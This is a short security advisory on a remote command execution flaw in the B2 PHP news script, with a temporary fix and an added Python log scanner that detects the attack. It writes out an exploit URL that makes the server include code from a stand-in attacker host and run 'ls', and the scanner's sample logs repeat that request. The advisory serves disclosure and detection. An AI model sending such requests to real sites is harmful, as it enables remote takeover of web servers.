B2 PHP Remote Command Execution

 
 Summary 
B2 is a PHP script that allows webmasters to quickly post news on the front page and lets viewers interact with each other. A bug in the script allows an attacker to remotely execute commands.

 
 Details 
Vulnerable systems:
 * B2 version 0.6pre2 and earlier

Vulnerable code:
Taken from /b2-include/b2edit.showposts.php

*snippet*



(NOTE: The attacker's server must not be able to run PHP; it has to open the file as text.)

The attacker can include the file like this:
http://host/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls

This would execute the ls command on "host".

Temporary fix:
Copy b2config.php into the b2-include directory 
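
A log check for the request shape shown above, added here as an example and not part of the original advisory or of B2: it flags requests to b2edit.showposts.php whose b2inc query parameter holds a remote URL. The log lines, client addresses and remote.example host are constructed, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2003:10:00:00 +0000] "GET /b2/index.php?p=12 HTTP/1.0" 200 5120',
    '198.51.100.9 - - [01/Jan/2003:10:00:05 +0000] "GET /b2/b2-include/b2edit.showposts.php'
    '?b2inc=http://remote.example&cmd=ls HTTP/1.0" 200 913',
    '198.51.100.9 - - [01/Jan/2003:10:00:09 +0000] "GET /b2/b2-include/b2edit.showposts.php'
    '?b2inc=http%3A%2F%2Fremote.example HTTP/1.0" 200 913',
    '198.51.100.3 - - [01/Jan/2003:10:01:00 +0000] "GET /b2/b2-include/b2edit.showposts.php'
    '?b2inc=b2-include HTTP/1.0" 200 2048',
    'malformed line without a request',
]

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any "scheme://" prefix means the include path points off-host.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

TARGET_SCRIPT = "/b2edit.showposts.php"  # file named in the advisory
TARGET_PARAM = "b2inc"                   # parameter named in the advisory


def find_remote_b2inc(lines):
    """Return (line_no, client_ip, decoded_value) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # unparsable line: skip rather than fail the whole scan
        url = urlsplit(match.group(1))
        if not url.path.endswith(TARGET_SCRIPT):
            continue
        # parse_qsl percent-decodes, so encoded "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == TARGET_PARAM and SCHEME_RE.match(value.strip()):
                hits.append((line_no, line.split()[0], value))
    return hits


if __name__ == "__main__":
    for line_no, client, value in find_remote_b2inc(SAMPLE_LOG):
        print(f"line {line_no}: {client} requested remote include {value!r}")
```

Only the query string is inspected; a value sent in a request body does not appear in an access log.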
 

    Source: geocities.com/ijookeren/xxx